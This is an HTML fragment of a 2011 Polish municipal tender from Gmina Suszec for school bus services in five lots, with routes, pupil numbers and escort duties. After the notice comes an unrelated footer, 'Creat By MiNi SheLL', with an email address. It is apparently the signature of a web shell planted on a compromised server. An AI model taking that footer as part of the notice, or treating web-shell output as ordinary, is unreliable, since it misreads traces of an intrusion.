<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2011 godzina 09:00, miejsce: Gminny Zespół Oświaty i Sportu w Suszcu, ul. Wyzwolenia 2, 43-267 Suszec, woj. śląskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie usługi przewozu uczniów niepełnosprawnych, wraz z zapewnieniem opieki, zgodnie z art. 17 ust. 3a i art. 14a ust. 4 ustawy z dnia 7 września 1991 r.  o systemie oświaty,  z terenu Gminy Suszec do  Zespołu Szkół Specjalnych Nr 3 w Pszczynie, Zespołu Szkół Specjalnych Nr 4 w Czechowicach - Dziedzicach  oraz do Szkoły Podstawowej Nr 18 w Pszczynie ( z oddziałami integracyjnymi)  w dniach nauki szkolnej zgodnie z organizacją roku szk. 2011/2012 i roku szk. 2012/2013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie usługi przewozu uczniów niepełnosprawnych, wraz z zapewnieniem opieki, zgodnie z art. 17 ust. 3a i art. 14a ust. 4 ustawy z dnia 7 września 1991 r.  o systemie oświaty,  z terenu Gminy Suszec do  Zespołu Szkół Specjalnych Nr 3 w Pszczynie, Zespołu Szkół Specjalnych Nr 4 w Czechowicach - Dziedzicach  oraz do Szkoły Podstawowej Nr 18 w Pszczynie ( z oddziałami integracyjnymi)  w dniach nauki szkolnej zgodnie z organizacją roku szk. 2011/2012 i roku szk. 2012/2013. Dowóz na godzinę 8:00- 8:30, powrót po skończonych zajęciach ok. godz. 15:20 - 15:30. Dopuszczalne są zmiany godzin dowozu i odwozu uczniów ze względu na organizację zajęć i po uzgodnieniu z Dyrektorami tych szkół. Liczba dowożonych uczniów w roku szk. 2011/2012 a) Zespół Szkół Specjalnych  Nr 3  w Pszczynie   - 20 uczniów, b)  Zespół Szkół Specjalnych Nr 4 w Czechowicach - Dziedzicach  - 1 uczeń, c)  Szkoła Podstawowa Nr 18 ( z oddziałami integracyjnymi) w Pszczynie - 2 uczniów. RAZEM   23 uczniów. Liczba uczniów dowożonych do w/w  placówek wynika z ilości uczniów do nich  zapisanych lub kontynuujących naukę w danym roku szkolnym. Liczba ta  może też  ulec zmianie począwszy od 
1 września 2012r. ( rok szkolny 2012/2013) , w zależności od decyzji i orzeczeń Poradni Psychologiczno- Pedagogicznych o potrzebie kształcenia specjalnego dzieci z terenu Gminy Suszec. Wykaz adresów  dowożonych  dzieci wraz z wyszczególnieniem nazwy szkoły i adresu szkoły, do której powinni być dowożeni zawiera Załącznik Nr 2 do niniejszej specyfikacji. Trasa  przewozu obejmuje dowóz i odwóz dzieci z miejsc zamieszkania lub miejsc i przystanków uzgodnionych z rodzicami dzieci  do w/w szkół  specjalnych. Opiekuna (osoba dorosła) na całej trasie przewozu do Zespołu Szkół Specjalnych Nr 3 w Pszczynie oraz do Szkoły Podstawowej nr 18 w Pszczynie (z oddziałami integracyjnymi) zapewnia WYKONAWCA. Natomiast opiekuna dla dziecka dowożonego do Zespołu Szkół Specjalnych nr 4 w Czechowicach - Dziedzicach zapewnia -  ZAMAWIAJĄCY. W przypadku niewykonania kursu pełnego dowozu dziecka  do Zespołu Szkół Specjalnych w Czechowicach- Dziedzicach  z powodu jego nieobecności,  stawka za  1 kurs przewozu zostanie pomniejszona  o 10 % . W przypadku nie wykonania tylko kursu dowozowego lub odwozowego do tej placówki,  stawka ta zostanie pomniejszona o 5%..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie usługi przewozu  uczniów do Gimnazjum Publicznego w Kryrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie usługi przewozu  uczniów do Gimnazjum Publicznego w Kryrach. Zadanie to obejmuje dowóz uczniów z Mizerowa  w dniach nauki szkolnej i zgodnie z organizacją roku szkolnego 2011/2012 i roku szkolnego 2012/ 2013, na godzinę 8.00, począwszy od przystanku   Mizerów - Borki, a następnie Mizerów Szkoła, Mizerów PGR -  do Gimnazjum w Kryrach, a następnie odwóz uczniów po zajęciach szkolnych  lub zajęciach pozalekcyjnych w odwrotnej kolejności,  zgodnie z rozkładem zajęć  szkolnych (zajęcia obowiązkowe i dodatkowe zajęcia edukacyjne) w danym roku szkolnym.  Przewidywane są  4 dodatkowe  odwozy uczniów w ciągu tygodnia, w wybranych przez dyrektora dniach,  ze względu na wydłużenie zajęć szkolnych na organizowane  zajęcia dodatkowe i pozalekcyjne. Wtedy liczba uczniów oczekujących  na 2 odwóz w ciągu dnia, będzie mniejsza i uzależniona od rodzaju zajęć i uczestniczących w nich uczniów. W okresie od września do listopada i od grudnia do marca danego roku liczba dowożonych uczniów może ulec zmianie ze względu na dojazdy uczniów własnymi środkami komunikacji. Informację w tej sprawie udzieli Dyrektor GP Kryry. Szczegółowy rozkład zajęć szkolnych przedstawi Dyrektor Gimnazjum w Kryrach na 5 dni przed datą rozpoczęcia dowozu. Ilość dzieci przewidzianych do przewozu: a)  w  roku szkolnym 2011/2012 -  60  uczniów, b)  w roku szkolnym 2012/2013 - 58 uczniów. Wykaz przystanków dowożonych uczniów oraz miejsc ich wsiadania i wysiadania zawiera Załącznik Nr 2. Opiekuna (osoba dorosła) w czasie dowożenia na całej trasie dowozu i odwozu  zapewnia WYKONAWCA..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonywanie usługi przewozu  uczniów do Gimnazjum Publicznego w Radostowicach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie usługi przewozu  uczniów do Gimnazjum Publicznego w Radostowicach. Zadanie to obejmuje dowóz  uczniów z Kobielic w dniach nauki szkolnej, zgodnie z organizacją roku szkolnego 2011/2012 i roku szkolnego 2012/2013, na godzinę 8:00, począwszy od przystanku Kobielice - Szkoła, a następnie przystanek Kobielice - Kościół,  Kobielice - MEDROS  i dalej do Gimnazjum w Radostowicach (parking przy kościele). Odwozy  po zajęciach szkolnych będą się odbywały w odwrotnej kolejności,  zgodnie z rozkładem zajęć  szkolnych ( zajęcia obowiązkowe i dodatkowe zajęcia edukacyjne)  w danym roku szkolnym). Przewidywane są  4 dodatkowe  odwozy uczniów w ciągu tygodnia, w wybranych przez dyrektora dniach,  ze względu na wydłużenie zajęć szkolnych na organizowane  zajęcia dodatkowe i pozalekcyjne. Wtedy liczba uczniów oczekujących  na 2 odwóz w ciągu dnia, będzie mniejsza i uzależniona od rodzaju zajęć i uczestniczących w nich uczniów. W okresie od września do listopada i od grudnia do marca danego roku liczba dowożonych uczniów może ulec zmianie ze względu na dojazdy uczniów własnymi środkami komunikacji. Informację w tej sprawie udzieli Dyrektor GP Radostowice. Szczegółowy rozkład zajęć szkolnych przedstawi Dyrektor Gimnazjum w Radostowicach  na 5 dni przed datą rozpoczęcia dowozu.  Ilość dzieci przewidzianych do przewozu: a)  w roku szkolnym 2011/2012 - 36  uczniów, b)  w roku szkolnym 2012/ 2013 - 48 uczniów. Wykaz przystanków dowożonych uczniów oraz miejsc ich wsiadania i wysiadania zawiera Załącznik Nr 2. Opiekuna (osoba dorosła) w czasie dowożenia na całej trasie dowozu i odwozu  zapewnia WYKONAWCA..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie to obejmuje wykonywanie usługi przewozu uczniów z  Suszca - Branicy  do Szkoły Podstawowej w Suszcu oraz dzieci oddziału 0  z  Suszca - Branicy do Przedszkola Publicznego w Suszcu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie to obejmuje wykonywanie usługi przewozu uczniów z  Suszca - Branicy  do Szkoły Podstawowej w Suszcu oraz dzieci oddziału 0  z  Suszca - Branicy do Przedszkola Publicznego w Suszcu. Liczba przewożonych uczniów: a)  w roku  szkolnym 2011/2012 - 7 uczniów  do Szkoły Podstawowej w Suszcu, - 2 dzieci  do oddziału 0 Przedszkola Publicznego w Suszcu, b)  w roku szkolnym  2012/ 2013 -  7 uczniów do Szkoły Podstawowej w Suszcu, w roku szkolnym 2012/2013 -2  dzieci  do oddziału 0 Przedszkola Publicznego w Suszcu. Wykaz przystanków dowożonych uczniów oraz miejsc ich wsiadania i wysiadania zawiera Załącznik Nr 2. Wykonawca zapewnia opiekuna (osoba dorosła) dowożonych uczniów  na całej trasie przewozu
Trasa przewozu obejmuje: Przewóz  dzieci  z miejsc zamieszkania lub miejsca ustalonego z rodzicami dzieci ( przystanek na skrzyżowaniu z ul. Pszczyńską  w Suszcu - Branicy) i przewiezienie ich do Szkoły Podstawowej w Suszcu i Przedszkola w Suszcu na godz. 8:00 i  odwóz dzieci po zajęciach szkolnych i przedszkolnych w każdym dniu nauki szkolnej i  zgodnie z organizacją roku szkolnego 2011/2012 i roku szkolnego 2012/2013 w placówkach feryjnych i nie feryjnych,  tj od 2 stycznia 2012  do 31 grudnia 2012 r. Informację o szczegółowych  godzinach  zakończenia zajęć w szkole i przedszkolu w poszczególnych dniach nauki szkolnej uzyskać można u dyrektora Szkoły Podstawowej w Suszcu i Przedszkola w Suszcu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie to obejmuje wykonywanie usługi przewozu uczniów niepełnosprawnych z Gminy Suszec do Ośrodka Rehabilitacyjno - Edukacyjno - Wychowawczego w Żorach, wraz z zapewnieniem opieki,  zgodnie z art. 17 ust. 3a i art. 14a ust. 4 ustawy z dnia 7 września 1991 r.  o systemie oświaty, w dniach nauki szkolnej zgodnie z organizacją roku szk. 2011/2012 i roku szk. 2012/2013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie to obejmuje wykonywanie usługi przewozu uczniów niepełnosprawnych z Gminy Suszec do Ośrodka Rehabilitacyjno - Edukacyjno - Wychowawczego w Żorach, wraz z zapewnieniem opieki,  zgodnie z art. 17 ust. 3a i art. 14a ust. 4 ustawy z dnia 7 września 1991 r.  o systemie oświaty, w dniach nauki szkolnej zgodnie z organizacją roku szk. 2011/2012 i roku szk. 2012/2013. Liczba ta  może też  ulec zmianie począwszy od 1 września 2012r. (rok szkolny 2012/2013), w zależności od decyzji i orzeczeń Poradni Psychologiczno - Pedagogicznych o potrzebie kształcenia specjalnego dzieci z terenu Gminy Suszec. Trasa  przewozu obejmuje dowóz i odwóz dzieci z miejsc zamieszkania lub miejsc i przystanków uzgodnionych z rodzicami dzieci  do w/w ośrodka. Dowóz do placówki od poniedziałku do piątku na godzinę 8 oo, powrót po zakończonych zajęciach około godz. 15 oo. Wykaz adresów dzieci (miejsc zamieszkania) zawiera Załącznik  Nr 2 do SIWZ. Opiekuna (osoba dorosła) na całej trasie przewozu zapewnia WYKONAWCA. Liczba przewożonych dzieci w roku szkolnym 2011/2012 wynosi 4. Liczba przewożonych dzieci w roku szkolnym 2012/2013 zostanie ustalona do dnia 31.08.2012r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com